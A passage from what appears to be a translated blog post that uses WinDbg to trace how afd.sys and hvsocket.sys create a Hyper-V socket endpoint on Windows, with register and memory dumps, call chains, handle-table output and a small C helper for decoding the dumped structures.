<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc @rdi – pointer to the _AFD_CONNECTION structure</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`2943e9e0 0001afd0 00000000 00000100 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`2943e9f0 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`2943ea00 00000000 00000000 27121080 ffffda85 ...........'....</span></div>
<br /><div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next hvsocket!VmbusTlEndpointIsPrivileged is called, then afd!AfdTLCreateEndpoint.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>r</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=ffffda852943e9e0 – pointer to the _AFD_CONNECTION being worked on</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rdx=0000000000000022 – Address Family</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">r8=0000000000000001 – Hyper-V RAW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">r9=ffffda8527f6b8c0 – pointer to one of the AfdTlTransportListHead elements</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In this function, 50h bytes on the stack are zeroed and then the parameters for hvsocket!VmbusTlProviderEndpoint are placed there:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dps @rsp+20</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff9080`26e7b250 fffff803`db362930 afd!AfdTLCreateEndpointComplete</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff9080`26e7b258 ffffda85`297201d0 - IRP</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff9080`26e7b260 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff9080`26e7b268 00000001`00010022</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff9080`26e7b270 ffffda85`2943e9e0 - pointer to _AFD_CONNECTION structure</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff9080`26e7b278 ffffda85`27121080 - Process object (not strictly required: in hvsocket, if it is zero, the driver calls PsGetCurrentProcess) </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff9080`26e7b280 ffffda85`28714080 - pointer to the THREAD structure of the ServerExample.exe process (if it is zero, ndis!NdisGetProcessObjectCompartmentId is called later, after the Process structure is loaded into rcx)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff9080`26e7b288 ffffca89`8568e280</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff9080`26e7b290 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff9080`26e7b298 00000000`00000000</span></div>
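<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The two dumps above (the first _AFD_CONNECTION dword 0001afd0 from the dc output, and the packed parameter qword 00000001`00010022 from the dps output) can be decoded mechanically when reading many such sessions. The C helper below is an added example, not code from the post; the field split it assumes (type word plus state byte; address family, socket type, protocol) is inferred from the dumped values and the rdx/r8 annotations, not from a documented structure.</span></div>

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* First dword of an _AFD_CONNECTION block as shown by "dc @rdi":
 *   low 16 bits = block-type word (0xAFD0, 0xAFD1, ... as listed in the post)
 *   next byte   = the call-type/state byte that changes after bind()
 * This layout is an assumption read off the dump, not a documented type. */
typedef struct {
    uint64_t address;    /* address column of the dc line */
    uint32_t raw;        /* first dword exactly as dumped */
    uint16_t type_word;  /* e.g. 0xAFD0 */
    uint8_t  state;      /* 1 right after socket(), 3 after bind() per the post */
    bool     has_sig;    /* true when the 0xAFD signature is present */
} afd_hdr;

/* 0xAFD sits in the upper three nibbles for AFD0..AFD8 and in the lower
 * three for AAFD, so accept either placement. */
static bool afd_has_signature(uint16_t w)
{
    return ((w >> 4) == 0xAFD) || ((w & 0x0FFF) == 0xAFD);
}

/* Parse one WinDbg "dc" line: "<addr> <dw0> <dw1> <dw2> <dw3> <ascii>".
 * Only the address and the first dword are used. Returns false if the
 * line does not start with an address followed by a hex dword. */
static bool parse_dc_line(const char *line, afd_hdr *out)
{
    char addr[32];
    unsigned int dw0;
    if (sscanf(line, "%31s %8x", addr, &dw0) != 2)
        return false;
    /* WinDbg prints 64-bit addresses with a backtick in the middle. */
    char *bt = strchr(addr, '`');
    if (bt)
        memmove(bt, bt + 1, strlen(bt));   /* also moves the NUL */
    out->address   = strtoull(addr, NULL, 16);
    out->raw       = dw0;
    out->type_word = (uint16_t)(dw0 & 0xFFFFu);
    out->state     = (uint8_t)((dw0 >> 16) & 0xFFu);
    out->has_sig   = afd_has_signature(out->type_word);
    return true;
}

/* Only the two values the post reports are named; everything else is unknown. */
static const char *afd_state_name(uint8_t s)
{
    switch (s) {
    case 1:  return "endpoint created (observed right after socket())";
    case 3:  return "bound (value the post reports after bind())";
    default: return "unknown";
    }
}

/* Packed endpoint parameters placed on the stack for
 * hvsocket!VmbusTlProviderEndpoint (the 00000001`00010022 qword). The split
 * matches the rdx/r8 values in the post (0x22 address family, 1 = Hyper-V
 * RAW); treating the middle word as the socket type is an assumption. */
typedef struct {
    uint16_t family;     /* 0x22 = AF_HYPERV (34) */
    uint16_t sock_type;  /* assumed: 1 = SOCK_STREAM */
    uint32_t protocol;   /* 1 = HV_PROTOCOL_RAW */
} afd_ep_params;

static afd_ep_params decode_endpoint_params(uint64_t q)
{
    afd_ep_params p;
    p.family    = (uint16_t)(q & 0xFFFFu);
    p.sock_type = (uint16_t)((q >> 16) & 0xFFFFu);
    p.protocol  = (uint32_t)(q >> 32);
    return p;
}

/* True when the parameters describe a Hyper-V socket (AF_HYPERV + HV_PROTOCOL_RAW). */
static bool is_hyperv_raw(const afd_ep_params *p)
{
    return p->family == 34 && p->protocol == 1;
}

int main(void)
{
    /* Constructed input: the "dc @rdi" line copied from the debugging session above. */
    const char *dc = "ffffda85`2943e9e0 0001afd0 00000000 00000100 00000000 ................";
    afd_hdr h;
    if (!parse_dc_line(dc, &h)) {
        fputs("unrecognised dc line\n", stderr);
        return 1;
    }
    printf("_AFD_CONNECTION @ %016llx: type=0x%04x sig=%s state=%u (%s)\n",
           (unsigned long long)h.address, h.type_word, h.has_sig ? "yes" : "no",
           h.state, afd_state_name(h.state));

    afd_ep_params p = decode_endpoint_params(0x0000000100010022ULL);
    printf("family=%u type=%u protocol=%u hyperv_raw=%s\n",
           p.family, p.sock_type, p.protocol, is_hyperv_raw(&p) ? "yes" : "no");
    return 0;
}
```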
<br /><div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Then the pointer to hvsocket!VmBusTlProviderEndpoint is loaded into rax, and r14 holds our IRP:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!irp @r14</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Irp is active with 4 stacks 4 is current (= 0xffffdf08c0c5b408)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">>[IRP_MJ_CREATE(0), N/A(0)]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 0 0 ffffdf08bf161920 ffffdf08c0eb5780 00000000-00000000 </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> \Driver\AFD</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Args: ffffa700e57f35d0 03000020 00030000 00000039</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The function is then called. The structure passed in rax is checked, then ndis!NdisGetThreadObjectCompartmentId is called for the ETHREAD object, then vmbus!VmbusTlCreateEndpoint (the 2nd parameter is a pointer to the EPROCESS object), and then hvsocket!VmbusTlCreateObjectFromLookasideList, which calls nt!ExpInterlockedPopEntrySList.</span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Then hvsocket!VmbusTlInitializeObject (which calls nt!KeInitializeEvent and nt!KeInitializeSpinLock). After the return from hvsocket!VmbusTlCreateObjectFromLookasideList, a memory block of size 200h with the Vnpi tag is allocated. Then a block of size 38h is zeroed, nt!KeEnterCriticalRegion and nt!ExAcquireFastMutexUnsafe are called, and hvsocket!VmbusTlEndpointActionWorkQueueRoutine is registered through netio!NetioInitializeWorkQueue. </span></div>
<br /><div dir="ltr" style="line-height: 1.26; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Later, after the return from vmbus!VmbusTlCreateEndpoint, afd!AfdTLCreateEndpointComplete(PIRP Irp) is called; its 4th parameter is a pointer to vmbus!VmbusTlProviderEndpointDispatch. Next, the hvsocket!VmbusTlCreateEndpoint address is written into the _AFD_CONNECTION element. Then afd!ObDereferenceSecurityDescriptor is called and the result is checked for success; depending on it, nt!IofCompleteRequest is executed or not. Then control returns from hvsocket.sys to afd.sys.</span></div>
<br /><div dir="ltr" style="line-height: 1.26; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The value returned by vmbus!VmBusTlProviderEndpoint is 103h (STATUS_PENDING). Therefore AfdTLPendRequest is called next (had the return value not been 103h, afd!AfdCompleteTLEndpCreate would be called immediately instead), and only after that afd!AfdCompleteTLEndpCreate and nt!IofCompleteRequest follow. Then afd!AfdCreate returns (with the same 103h in rax).</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc 0xf6f368 – after execution of NtCreateFile</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f368 00000000 00000000 00f6f498 00000003 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f378 </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00000144</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 00000000 00000000 00000022 D..........."...</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f388 00000000 00000144 c0140000 00000020 ....D....... ...</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f398 80000000 00000001 00000039 00000022 ........9..."...</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0x144 is the handle that will eventually be returned by the </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">socket</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> function and passed to the </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bind</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> function as its first parameter. This handle is created by nt!ObpCreateHandle, called from nt!ObOpenObjectByNameEx (earlier, during NtCreateFile).</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>k</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Child-SP RetAddr Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd201`d9b6e820 fffff801`a72630e9 nt!ObOpenObjectByNameEx+0x310</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd201`d9b6e960 fffff801`a7262cf9 nt!IopCreateFile+0x3d9</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd201`d9b6ea00 fffff801`a6fd4493 nt!NtCreateFile+0x79</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd201`d9b6ea90 00007ff9`e3f46b74 nt!KiSystemServiceCopyEnd+0x13</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000000`00e3e0a8 00000000`58f9ae28 ntdll!NtCreateFile+0x14</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Before the function executes, the process handle table contains:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">!handle 0 f ffffda8527121080</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">013c: Object: ffffca8986a9e3d0 GrantedAccess: 00020019 (Inherit) Entry: ffffca8985cb14f0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Object: ffffca8986a9e3d0 Type: (ffffda852717d0e0) Key</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ObjectHeader: ffffca8986a9e3a0 (new version)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HandleCount: 1 PointerCount: 32759</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Directory Object: 00000000 Name: \REGISTRY\MACHINE\SYSTEM\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\NAMESPACE_CATALOG5</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0140: Object: ffffda85299be6f0 GrantedAccess: 001f0003 (Audit) Entry: ffffca8985cb1500</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Object: ffffda85299be6f0 Type: (ffffda8527087650) Event</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ObjectHeader: ffffda85299be6c0 (new version)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HandleCount: 1 PointerCount: 1</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0144: free handle, Entry address ffffca8985cb1510, Next Entry ffffca8985cb1520</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0148: free handle, Entry address ffffca8985cb1520, Next Entry ffffca8985cb1530</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After the function executes, a new entry appears:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">!handle 0 f 0xffffe382ff528480 – ServerExample.exe process object</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0144: Object: ffffda8529a9bcf0 GrantedAccess: 0016019f (Audit) Entry: ffffca8985cb1510</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Object: ffffda8529a9bcf0 Type: (ffffda852718cb00) File</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ObjectHeader: ffffda8529a9bcc0 (new version)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> HandleCount: 1 PointerCount: 2</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> Directory Object: 00000000 Name: \Endpoint {Afd}</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0148: free handle, Entry address ffffca8985cb1520, Next Entry ffffca8985cb1530</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="95" src="https://lh3.googleusercontent.com/G5seDSY8r9ol9vlVc6o8HfTjW7GKqD8emsej8qzHP4_6D4SpHrZHp8s1eqhwCC-dAY5Hzvli4Z4_bLqRuP5ujxL0q-BsgtbpjuHBDGWBU9hmzYmJ3UU_LjOYcpAnAhIGc9x1kdSf2FYBCU32qg" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="323" /></span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The instruction mov rax, [rbp-58h] loads the handle value into rax.</span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We return to user mode. Next comes the mswsock!SockGetInformation call, from which ntdll!NtDeviceIoControlFile is called with the file handle returned earlier (0x144):</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NTSTATUS WINAPI NtDeviceIoControlFile(</span></div>
